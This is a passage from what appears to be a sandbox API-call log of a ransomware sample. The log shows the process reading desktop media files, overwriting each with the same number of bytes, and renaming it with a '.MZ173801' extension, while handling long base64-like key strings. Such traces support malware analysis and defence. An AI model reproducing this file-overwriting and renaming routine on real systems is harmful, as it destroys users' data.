yMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] GetCurrentThreadId () returned 0x1358 [0123.519] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\v8 HU.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\v8 hu.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.520] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.520] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.520] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x17e35 [0123.520] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.520] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17e35, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x17e35, lpOverlapped=0x0) returned 1 [0123.521] CloseHandle (hObject=0x410) returned 1 [0123.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\v8 HU.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\v8 hu.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.524] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17e35, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x17e35, lpOverlapped=0x0) returned 1 [0123.526] CloseHandle (hObject=0x410) returned 1 [0123.526] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\v8 HU.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\v8 hu.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\v8 HU.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\v8 hu.mkv.mz173801")) returned 1 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] GetCurrentThreadId () returned 0x1358 [0123.527] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bd28f0, ftCreationTime.dwHighDateTime=0x1d5ed71, ftLastAccessTime.dwLowDateTime=0x778ba2d0, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0x778ba2d0, ftLastWriteTime.dwHighDateTime=0x1d5ea54, nFileSizeHigh=0x0, nFileSizeLow=0x12799, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WUbrVo Nrjfu.wav", cAlternateFileName="WUBRVO~1.WAV")) returned 1 [0123.527] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.527] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.527] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUbrVo Nrjfu.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wubrvo nrjfu.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70bd28f0, ftCreationTime.dwHighDateTime=0x1d5ed71, ftLastAccessTime.dwLowDateTime=0x778ba2d0, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0x778ba2d0, ftLastWriteTime.dwHighDateTime=0x1d5ea54, nFileSizeHigh=0x0, nFileSizeLow=0x12799)) returned 1 [0123.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.528] GetCurrentThreadId () returned 0x1358 [0123.528] GetCurrentThreadId () returned 0x1358 [0123.528] GetCurrentThreadId () returned 0x1358 [0123.528] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.529] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.529] GetCurrentThreadId () returned 0x1358 [0123.529] GetCurrentThreadId () returned 0x1358 [0123.529] GetCurrentThreadId () returned 0x1358 [0123.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUbrVo Nrjfu.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wubrvo nrjfu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.529] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.529] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.529] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x12799 [0123.529] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.530] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x12799, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x12799, lpOverlapped=0x0) returned 1 [0123.531] CloseHandle (hObject=0x410) returned 1 [0123.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WUbrVo Nrjfu.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wubrvo nrjfu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.533] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x12799, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x12799, lpOverlapped=0x0) returned 1 [0123.538] CloseHandle (hObject=0x410) returned 1 [0123.538] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\WUbrVo Nrjfu.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wubrvo nrjfu.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\WUbrVo Nrjfu.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\wubrvo nrjfu.wav.mz173801")) returned 1 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.538] GetCurrentThreadId () returned 0x1358 [0123.539] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4d5cd0, ftCreationTime.dwHighDateTime=0x1d5e3b6, ftLastAccessTime.dwLowDateTime=0x2e5eb4b0, ftLastAccessTime.dwHighDateTime=0x1d5e731, ftLastWriteTime.dwLowDateTime=0x2e5eb4b0, ftLastWriteTime.dwHighDateTime=0x1d5e731, nFileSizeHigh=0x0, nFileSizeLow=0xc9eb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="x-fqzeifd646TQM_WO.mp3", cAlternateFileName="X-FQZE~1.MP3")) returned 1 [0123.594] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.594] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\x-fqzeifd646TQM_WO.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\x-fqzeifd646tqm_wo.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4d5cd0, ftCreationTime.dwHighDateTime=0x1d5e3b6, ftLastAccessTime.dwLowDateTime=0x2e5eb4b0, ftLastAccessTime.dwHighDateTime=0x1d5e731, ftLastWriteTime.dwLowDateTime=0x2e5eb4b0, ftLastWriteTime.dwHighDateTime=0x1d5e731, nFileSizeHigh=0x0, nFileSizeLow=0xc9eb)) returned 1 [0123.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxO